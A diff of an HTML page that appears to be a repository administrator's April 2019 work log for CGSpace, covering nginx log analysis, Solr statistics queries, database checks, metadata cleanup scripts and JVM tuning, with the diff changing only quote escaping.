<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre><h2 id="2019-04-02">2019-04-02</h2>
<ul>
<li>CTA says the Amazon IPs are AWS gateways for real user traffic</li>
@ -191,7 +191,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
</code></pre><ul>
<li>We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!</li>
<li>Next I will resolve all their names using my <code>resolve-orcids.py</code> script:</li>
@ -201,7 +201,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim</li>
<li>One user&rsquo;s name has changed so I will update those using my <code>fix-metadata-values.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><ul>
<li>I created a pull request and merged the changes to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/417">#417</a>)</li>
<li>A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it&rsquo;s still going:</li>
@ -210,7 +210,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</code></pre><ul>
<li>Interestingly, there are 5666 occurences, and they are mostly for the 2018 core:</li>
</ul>
<pre tabindex="0"><code>$ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;org.dspace.statistics.SolrLogger @ Updating&#39; /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk &#39;{print $11}&#39; | sort | uniq -c
1
3 http://localhost:8081/solr//statistics-2017
5662 http://localhost:8081/solr//statistics-2018
@ -222,7 +222,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Uptime Robot reported that CGSpace (linode18) went down tonight</li>
<li>I see there are lots of PostgreSQL connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
10 dspaceCli
250 dspaceWeb
@ -257,7 +257,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</li>
<li>Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 18.195.78.144
245 207.46.13.58
303 207.46.13.194
@ -268,7 +268,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
1803 66.249.79.59
2834 2a01:4f8:140:3192::2
9623 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
31 66.249.79.62
41 207.46.13.210
42 40.77.167.66
@ -287,14 +287,14 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Their user agent is the one I added to the badbots list in nginx last week: &ldquo;GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1&rdquo;</li>
<li>They made 22,000 requests to Discover on this collection today alone (and it&rsquo;s only 11AM):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;06/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;06/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
22077 /handle/10568/72970/discover
</code></pre><ul>
<li>Yesterday they made 43,000 requests and we actually blocked most of them:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
43631 /handle/10568/72970/discover
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -E &#39;/handle/[0-9]+/[0-9]+/discover&#39; | awk &#39;{print $9}&#39; | sort | uniq -c
142 200
43489 503
</code></pre><ul>
@ -315,53 +315,53 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 96925,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 96925,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-03&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-03&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
<li>Strangely I don&rsquo;t see many hits in 2019-04:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 38,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 38,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-04&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-04&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
@ -419,8 +419,8 @@ X-XSS-Protection: 1; mode=block
</code></pre><ul>
<li>And from the server side, the nginx logs show:</li>
</ul>
<pre tabindex="0"><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &quot;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 68078 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &quot;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 0 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
<pre tabindex="0"><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &#34;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 68078 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &#34;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 0 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
</code></pre><ul>
<li>So definitely the <em>size</em> of the transfer is more efficient with a HEAD, but I need to wait to see if these requests show up in Solr
<ul>
@ -448,26 +448,26 @@ X-XSS-Protection: 1; mode=block
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics">DSpace 5.x Solr documentation</a> the default commit time is after 15 minutes or 10,000 documents (see <code>solrconfig.xml</code>)</li>
<li>I looped some GET and HEAD requests to a bitstream on my local instance and after some time I see that they <em>do</em> register as downloads (even though they are internal):</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 909,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 909,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 0,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;isInternal:true&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 0,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;isInternal:true&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND time:2019-04-07*&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND time:2019-04-07*&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
@ -501,7 +501,7 @@ X-XSS-Protection: 1; mode=block
</code></pre><ul>
<li>According to the server logs there is actually not much going on right now:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
118 18.195.78.144
128 207.46.13.219
129 167.114.64.100
@ -512,7 +512,7 @@ X-XSS-Protection: 1; mode=block
363 40.77.167.21
740 2a01:4f8:140:3192::2
4823 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 66.249.79.62
3 66.249.83.196
4 207.46.13.86
@ -529,7 +529,7 @@ X-XSS-Protection: 1; mode=block
<li><code>2408:8214:7a00:868f:7c1e:e0f3:20c6:c142</code> is some stupid Chinese bot making malicious POST requests</li>
<li>There are free database connections in the pool:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
23 dspaceWeb
@ -560,7 +560,7 @@ X-XSS-Protection: 1; mode=block
<li>See the <a href="https://github.com/OpenRefine/OpenRefine/wiki/Variables#recon">OpenRefine variables documentation</a> for more notes about the <code>recon</code> object</li>
<li>I also noticed a handful of errors in our current list of affiliations so I corrected them:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
</code></pre><ul>
<li>We should create a new list of affiliations to update our controlled vocabulary again</li>
<li>I dumped a list of the top 1500 affiliations:</li>
@ -570,20 +570,20 @@ COPY 1500
</code></pre><ul>
<li>Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural and Livestock Research^M%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;International Institute for Environment and Development&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;International Institute^M%&#39;;
dspace=# UPDATE metadatavalue SET text_value=&#39;Kenya Agriculture and Livestock Research Organization&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;Kenya Agricultural and Livestock Research^M%&#39;;
</code></pre><ul>
<li>I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;%%&#39;) to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
COPY 60
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE &#39;%%&#39;) to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
COPY 20
</code></pre><ul>
<li>I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
</code></pre><ul>
<li>UptimeRobot said that CGSpace (linode18) went down tonight
<ul>
@ -592,7 +592,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
250 dspaceWeb
@ -609,7 +609,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode Support still didn&rsquo;t respond to my ticket from yesterday, so I attached a new output of <code>iostat 1 10</code> and asked them to move the VM to a less busy host</li>
<li>The web server logs are not very busy:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
124 40.77.167.135
135 95.108.181.88
139 157.55.39.206
@ -620,7 +620,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
457 157.55.39.164
457 40.77.167.132
3822 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 129.0.79.206
5 41.205.240.21
7 207.46.13.95
@ -636,7 +636,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode sent an alert that CGSpace (linode18) was 440% CPU for the last two hours this morning</li>
<li>Here are the top IPs in the web server logs around that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
18 66.249.79.139
21 157.55.39.160
29 66.249.79.137
@ -647,7 +647,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
1166 45.5.184.72
4251 45.5.186.2
4895 205.186.128.185
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
200 144.48.242.108
202 207.46.13.185
206 18.194.46.84
@ -665,7 +665,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
</code></pre><ul>
<li>Database connection usage looks fine:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
11 dspaceWeb
@ -683,15 +683,15 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Abenet pointed out a possibility of validating funders against the <a href="https://support.crossref.org/hc/en-us/articles/215788143-Funder-data-via-the-API">CrossRef API</a></li>
<li>Note that if you use HTTPS and specify a contact address in the API request you have less likelihood of being blocked</li>
</ul>
<pre tabindex="0"><code>$ http 'https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org'
<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org&#39;
</code></pre><ul>
<li>Otherwise, they provide the funder data in <a href="https://www.crossref.org/services/funder-registry/">CSV and RDF format</a></li>
<li>I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn&rsquo;t match will need a human to go and do some manual checking and informed decision making&hellip;</li>
<li>If I want to write a script for this I could use the Python <a href="https://habanero.readthedocs.io/en/latest/modules/crossref.html">habanero library</a>:</li>
</ul>
<pre tabindex="0"><code>from habanero import Crossref
cr = Crossref(mailto=&quot;me@cgiar.org&quot;)
x = cr.funders(query = &quot;mercator&quot;)
cr = Crossref(mailto=&#34;me@cgiar.org&#34;)
x = cr.funders(query = &#34;mercator&#34;)
</code></pre><h2 id="2019-04-11">2019-04-11</h2>
<ul>
<li>Continue proofing IITA&rsquo;s last round of batch uploads from <a href="https://dspacetest.cgiar.org/handle/10568/100333">March on DSpace Test</a> (20193rd.xls)
@ -720,8 +720,8 @@ x = cr.funders(query = &quot;mercator&quot;)
</li>
<li>I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA&rsquo;s records, so I applied them to DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d
</code></pre><ul>
<li>Answer more questions about DOIs and Altmetric scores from WLE</li>
<li>Answer more questions about DOIs and Altmetric scores from IWMI
@ -753,7 +753,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
<ul>
<li>Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:</li>
</ul>
<pre tabindex="0"><code>GC_TUNE=&quot;-XX:NewRatio=3 \
<pre tabindex="0"><code>GC_TUNE=&#34;-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
-XX:MaxTenuringThreshold=8 \
@ -766,7 +766,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
-XX:CMSInitiatingOccupancyFraction=50 \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled&quot;
-XX:+ParallelRefProcEnabled&#34;
</code></pre><ul>
<li>I need to remember to check the Munin JVM graphs in a few days</li>
<li>It might be placebo, but the site <em>does</em> feel snappier&hellip;</li>
@ -791,14 +791,14 @@ import re
import urllib
import urllib2
handle = re.findall('[0-9]+/[0-9]+', value)
handle = re.findall(&#39;[0-9]+/[0-9]+&#39;, value)
url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0]
url = &#39;https://cgspace.cgiar.org/rest/handle/&#39; + handle[0]
req = urllib2.Request(url)
req.add_header('User-agent', 'Alan Python bot')
